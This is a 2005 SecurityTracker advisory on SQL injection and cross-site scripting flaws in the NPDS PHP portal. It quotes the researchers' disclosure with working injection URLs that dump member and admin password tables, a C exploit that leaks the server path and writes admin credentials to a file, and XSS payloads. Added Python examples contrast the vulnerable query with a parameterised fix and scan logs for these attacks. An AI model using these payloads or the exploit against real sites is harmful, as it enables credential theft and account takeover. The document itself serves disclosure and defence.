NPDS Input Validation Holes in 'glossaire' Module and Links Search Script Permit SQL Injection

SecurityTracker Alert ID: 1014073
SecurityTracker URL: http://securitytracker.com/id?1014073
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 29 2005
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes

Description: NoSP and Romano reported several vulnerabilities in NPDS. A remote user can inject SQL commands and can conduct cross-site scripting attacks.
Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.
The '/modules/glossaire/glossaire.php' script (whose 'glossaire' table is not installed by default) does not properly validate user-supplied input in the 'terme' variable: the value is passed through stripslashes() and then used directly in mysql_query(). Two demonstration exploit URLs are provided, one reading the 'users' table and one the 'authors' table; both are truncated at the same point here (the full URLs appear in the source message below):
http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,
The 'links.php?op=search' script does not properly validate user-supplied input in the 'query' parameter. Here the injected SELECT ends with INTO OUTFILE, so the result is written to a file on the server (the demonstrations target a path under the web root) rather than displayed in the page. Some demonstration exploit URLs are provided (truncated here; the full URLs appear in the source message below):
http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'
http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/va
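How the injection in the glossaire and links searches works, shown as an added example that is not NPDS code: the vulnerable search builds its SQL by string concatenation, so a value that closes the quoted term and appends a UNION with the same number of columns returns rows from whichever table the attacker names, while a parameterised query binds the same value and returns nothing. The schema, the rows, the six-column glossaire layout and the shape of the search query are assumptions for the demonstration (only the table and column names, users.uname/pass and authors.aid/pwd, come from the advisory's payloads). It runs on SQLite, so the MySQL-only INTO OUTFILE step that writes the result to a file is not reproduced.

```python
import sqlite3
from typing import List, Tuple

# Constructed in-memory schema and rows for the demonstration (sample data,
# not NPDS's). Table and column names follow the advisory's payloads
# (users.uname/pass, authors.aid/pwd); the six-column glossaire layout, the
# search query shape and the password values are assumptions.
SCHEMA = """
CREATE TABLE glossaire (id INTEGER, type INTEGER, terme TEXT,
                        definition TEXT, affiche TEXT, extra TEXT);
CREATE TABLE users   (uname TEXT, pass TEXT);
CREATE TABLE authors (aid TEXT, pwd TEXT);
INSERT INTO glossaire VALUES (1, 3, 'xss', 'cross-site scripting', '1', '');
INSERT INTO glossaire VALUES (2, 3, 'draft', 'not published', '0', '');
INSERT INTO users   VALUES ('alice', 'hash-of-alice-password');
INSERT INTO authors VALUES ('admin', 'hash-of-admin-password');
"""

def open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def search_vulnerable(con: sqlite3.Connection, terme: str) -> List[Tuple]:
    """String-built query: the user value becomes SQL text, which is the
    pattern the advisory describes ($terme straight into mysql_query())."""
    sql = ("SELECT id, type, terme, definition, affiche, extra FROM glossaire "
           f"WHERE terme='{terme}' AND affiche!='0'")
    return con.execute(sql).fetchall()

def search_fixed(con: sqlite3.Connection, terme: str) -> List[Tuple]:
    """Parameterised query: the value is bound by the driver and never parsed
    as SQL, so quotes and keywords inside it are just characters."""
    sql = ("SELECT id, type, terme, definition, affiche, extra FROM glossaire "
           "WHERE terme=? AND affiche!='0'")
    return con.execute(sql, (terme,)).fetchall()

# Payloads built on the advisory's principle: close the quoted term, append a
# UNION with the same number of columns as the original SELECT (six here), and
# comment out the rest of the statement with /*.
USERS_PAYLOAD = "' UNION SELECT 0,0,uname,pass,0,0 FROM users WHERE uname<>''/*"
ADMINS_PAYLOAD = "' UNION SELECT 0,0,aid,pwd,0,0 FROM authors WHERE aid<>''/*"

def leaked_credentials(con: sqlite3.Connection, payload: str) -> List[Tuple[str, str]]:
    """(name, secret) pairs the vulnerable search returns in the columns where
    the glossary term and its definition would normally be displayed."""
    return [(row[2], row[3]) for row in search_vulnerable(con, payload)]

if __name__ == "__main__":
    con = open_db()
    print("ordinary search :", search_vulnerable(con, "xss"))
    print("leaked members  :", leaked_credentials(con, USERS_PAYLOAD))
    print("leaked admins   :", leaked_credentials(con, ADMINS_PAYLOAD))
    print("bound parameter :", search_fixed(con, USERS_PAYLOAD))
```

The column count in the UNION has to match the original SELECT, which is why the advisory's glossaire payloads carry six values and the links.php payloads eight: the attacker counts columns by trial until the database stops complaining.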
A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NPDS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>
http://[target]/npds/powerpack_f.php?language=<script>alert()</script>
http://[target]/npds/sdv_infos.php?sitename=<script>alert()</script>
http://[target]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>
http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>
http://[target]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E
The 'reply.php' script does not properly validate user-supplied input in the 'image_subject' parameter. A remote user can inject scripting code that will be permanently retained on the system (persistent cross-site scripting). The demonstration value starts with '">' to close the HTML attribute the parameter is echoed into before opening a script tag:
http://[target]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider
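Hunting for these requests in a web server log, as an added example that is not part of the advisory: the code below percent-decodes each request target from Apache combined-format lines and flags the indicators the advisory's URLs exhibit (UNION SELECT, INTO OUTFILE, a quote followed by the /* comment terminator, <script> tags, and the "> attribute break-out used against reply.php), plus direct requests for modules/links/admin/links.php, the admin script the proof-of-concept in the source message below requests to read the filesystem path out of PHP's error output. The log lines are constructed for the example (IPs, timestamps and sizes are invented); their request paths are the advisory's demonstration URLs, percent-encoded as a browser or the proof-of-concept would send them. Indicator names are this example's own.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (IPs, timestamps and sizes are
# invented). The request targets are the advisory's demonstration URLs as a
# browser or the PoC would send them, i.e. percent-encoded.
SAMPLE_LOG = """
10.0.0.5 - - [28/May/2005:11:35:41 +0200] "GET /npds/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [28/May/2005:11:36:02 +0200] "GET /npds/modules/links/admin/links.php HTTP/1.1" 200 412 "-" "-"
10.0.0.9 - - [28/May/2005:11:36:03 +0200] "GET /npds/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'/var/www/html/npds/Authors.txt'/* HTTP/1.1" 200 3990 "-" "-"
10.0.0.7 - - [28/May/2005:11:40:10 +0200] "GET /npds/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.7 - - [28/May/2005:11:41:00 +0200] "GET /npds/reply.php?post=1&forum=1&topic=1&stop=2&image_subject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&message=test HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [28/May/2005:11:42:30 +0200] "GET /npds/links.php?op=search&query=google HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators, applied to the percent-decoded target so that "%20UNION%20SELECT"
# and "UNION SELECT" are treated alike. The names are this example's own.
INDICATORS = {
    "sqli_union":     re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "sqli_outfile":   re.compile(r"\bINTO\s+OUTFILE\b", re.I),
    "sqli_comment":   re.compile(r"'\s*(?:/\*|--)"),            # quote, then comment out the tail
    "xss_script":     re.compile(r"<\s*/?\s*script\b", re.I),
    "xss_attr_break": re.compile(r"""["']\s*>\s*<"""),           # "><script ... leaves an attribute
    "path_probe":     re.compile(r"/modules/links/admin/links\.php(?:\?|$)", re.I),
}

def classify(target: str) -> List[str]:
    """Return the names of the indicators that fire for one request target."""
    decoded = unquote_plus(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan(log_text: str) -> List[Dict[str, object]]:
    """Parse combined-format lines and keep those with at least one indicator."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line; skip it
        hits = classify(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": int(m["status"]),
                             "target": m["target"], "indicators": hits})
    return findings

def attackers(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct client addresses that produced at least one finding, sorted."""
    return sorted({str(f["ip"]) for f in findings})

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["status"], ",".join(f["indicators"]), str(f["target"])[:70])
    print("sources:", attackers(results))
```

A 200 status on the INTO OUTFILE request is worth noting during triage: MySQL writes the file silently when the database account has the FILE privilege, so the only evidence that it succeeded is a request for the new file shortly afterwards from the same address.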

Impact: A remote user can execute SQL commands on the underlying database.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NPDS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: The vendor has issued a patch, available at:
http://www.npds.org/download.php?op=geninfo&did=115

Vendor URL: www.npds.org/

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: NoSP <NoSP@thehackademy.net>

Message History:
None.

Source Message Contents

Date: Sat, 28 May 2005 11:35:41 +0200
From: NoSP <NoSP@thehackademy.net>
Subject: NPDS Input validation holes, Xss & SQL Injection

Script:
********
NPDS is a portal system written in PHP/MySQL. It is released under the
GNU/GPL licence.
http://www.npds.org
Version: all except the latest, SABLE
Problem:
**********
- Non-persistent XSS
- Persistent XSS
- SQL injection (retrieval of members' logins and passwords)
Details:
*********
1) Non-persistent XSS:
----------------------
It is enough to request:
http://[site]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>
http://[site]/npds/powerpack_f.php?language=<script>alert()</script>
//same for push.php
http://[site]/npds/sdv_infos.php?sitename=<script>alert()</script>
http://[site]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>
http://[site]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E
2) Persistent XSS:
------------------
The $image_subject variable of the reply.php page is not filtered to block
certain dangerous tags.
http://[site]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider
3) SQL injection:
------------------
- Page /modules/glossaire/glossaire.php
The module's "glossaire" SQL table must be installed (which is not the case
by default!).
The $terme variable goes through a stripslashes() and is used directly in the
mysql_query(), which is very dangerous. Here are 2 possible exploits:
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20users%20where%20uname<>''/*
You will see the logins/passwords of all members displayed on the
glossaire.php page!
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,aid,pwd,0,0%20from%20authors%20where%20name<>''/*
You will see the logins/passwords of all ADMINS displayed on the
glossaire.php page!
- Page links.php?op=search
Here it is the same problem as the previous injection.
2 exploits:
http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sqlinjection.txt'/*
Will create a text file with the contents of the users table (member
credentials).
http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sauvegarde.txt'/*
Will create a text file with the contents of the authors table (admin
credentials).
Fix:
**************
Update to the SABLE version
or
apply the corrective patch for Narval:
http://www.npds.org/download.php?op=geninfo&did=115
Proof of concept SQL injection links.php:
******************************************
#include <string.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* HTTP port */
#define PORT 80
#define MAXLEN 4096
int main(int argc, char *argv[]){
if ((argc != 2) || (strlen(argv[1])>=256))
{
printf( "\n");
printf( "-----------------------------------------------------------------\n");
printf( " Xploit_NPDS-Narval\n");
printf( " NPDS Remote SQL Injection Proof of concept\n");
printf( " Vulnerability discovered && Exploit coded by \n");
printf( " Romano <romano_45_at_hotmail_dot_com> &&\n");
printf( " NoSP <NoSP_at_thehackademy_dot_net>\n");
printf( " Usage: ./Xploit_npds_5.0 <server> or <ip>\n");
printf( " ex : ./Xploit_npds_5.0 127.0.0.1 or\n");
printf( " ./Xploit_npds_5.0 localhost or\n");
printf( " ./Xploit_npds_5.0 www.site.com/npds\n");
printf( "-----------------------------------------------------------------\n");
exit(1);
}
/* variables; the buffers are zero-filled so that every strcat() below
   appends to a terminated string */
int fd;
ssize_t n;
char *fin_cut;
char *deb_cut;
char dossier[512] = {0};
char path_disclosure[MAXLEN] = {0};
char recept[1024] = {0};
char path[2048] = {0};
char sql_inject[MAXLEN] = {0};
char envoi[]="non";
/* the injected query: the advisory's links.php payload, percent-encoded,
   up to the opening quote of the OUTFILE path, which is appended later */
static const char query[]=
"links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0"
"%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'";
/* Split off the subdirectory if NPDS is not at the web root */
if(strstr(argv[1],"/")){
deb_cut=strstr(argv[1],"/")+strlen("/");
strcpy(dossier,"/");
strcat(dossier,deb_cut);
strcat(dossier,"/");
/* cut off the domain name */
fin_cut=strstr(argv[1],"/");
*fin_cut='\0';
}else{
strcpy(dossier,"/");
}
/* Create the socket */
if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
perror("Cannot create a socket");
exit(EXIT_FAILURE);}
/* Fill in the sockaddr_in structure */
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
addr.sin_family=AF_INET;
addr.sin_port=htons(PORT);
addr.sin_addr.s_addr=inet_addr(argv[1]);
/* Connect, resolving the host name first if argv[1] is not a dotted quad */
if( addr.sin_addr.s_addr!=INADDR_NONE){
if(connect(fd,(struct sockaddr *)&addr,sizeof(addr))==-1){
perror("Cannot connect to the server. Check the address; it must be of the form 159.125.45.21 or www.site.com");
exit(EXIT_FAILURE);
}
}else{
/* host name resolution */
struct hostent *hp;
if((hp=gethostbyname(argv[1]))){
memcpy(&(addr.sin_addr),hp->h_addr_list[0],sizeof(addr.sin_addr));
if(connect(fd,(struct sockaddr *)&addr,sizeof(addr))==-1){
perror("Cannot connect to the server. Check the address; it must be of the form 159.125.45.21 or www.site.com");
exit(EXIT_FAILURE);
}
}else{ printf("Sorry, host name not found\n");exit(1);}
}
/* Build the request (path_disclosure) that reveals the site's filesystem
   path: requesting this admin script directly makes PHP print an error
   message that contains the script's full path */
strcpy(path_disclosure,"GET ");
strcat(path_disclosure,dossier);
strcat(path_disclosure,"modules/links/admin/links.php HTTP/1.1\r\nHost: ");
strcat(path_disclosure,argv[1]);
strcat(path_disclosure,"\r\nConnection: Keep-Alive\r\n\r\n");
/* and send it */
if(send(fd,path_disclosure,strlen(path_disclosure),0)>0){printf("Looking for the site's $PATH.....\n");}
/* receive and process the answer */
while((n=recv(fd,recept,sizeof(recept)-1,0))>0){
recept[n]='\0';
/* Extract the $PATH (everything between "in <b>" and "modules/") and
   build the injection request */
deb_cut=strstr(recept,"_error() in <b>");
fin_cut=deb_cut?strstr(deb_cut,"modules/"):NULL;
if(deb_cut && fin_cut){
deb_cut+=strlen("_error() in <b>");
*fin_cut='\0';
strncpy(path,deb_cut,sizeof(path)-1);
printf("$PATH retrieved.................\n%s\n",path);
strcpy(envoi,"oui");
}else{
printf("Sorry, could not retrieve the $PATH\n");
exit(1);
}
if(strstr(envoi,"oui")){
/* Build the request (sql_inject) that makes MySQL write Authors.txt,
   holding the admin passwords, into the site's directory */
strcpy(sql_inject,"GET ");
strcat(sql_inject,dossier);
strcat(sql_inject,query);
strcat(sql_inject,path);
strcat(sql_inject,"Authors.txt'/* HTTP/1.1\r\nHost: ");
strcat(sql_inject,argv[1]);
strcat(sql_inject,"\r\nConnection: Keep-Alive\r\n\r\n");
/* and send it to the site, which creates Authors.txt */
if(send(fd,sql_inject,strlen(sql_inject),0)>0){
printf("SQL injection..................\nCreating the file http://%s%sAuthors.txt\n",argv[1],dossier);
close(fd);
return 0;
}else{
printf("Sorry, could not create the file\n");
exit(1);
}
}
memset(recept,0,sizeof(recept));
memset(path,0,sizeof(path));
memset(sql_inject,0,sizeof(sql_inject));
memset(path_disclosure,0,sizeof(path_disclosure));
}
close(fd);
return 0;
}
Credits:
*********
NoSP <nosp@thehackademy.net>
Romano <romano_45@hotmail.com>
We would like to thank Philippe, alias Developpeur, for his good reaction and
his quick fix ;)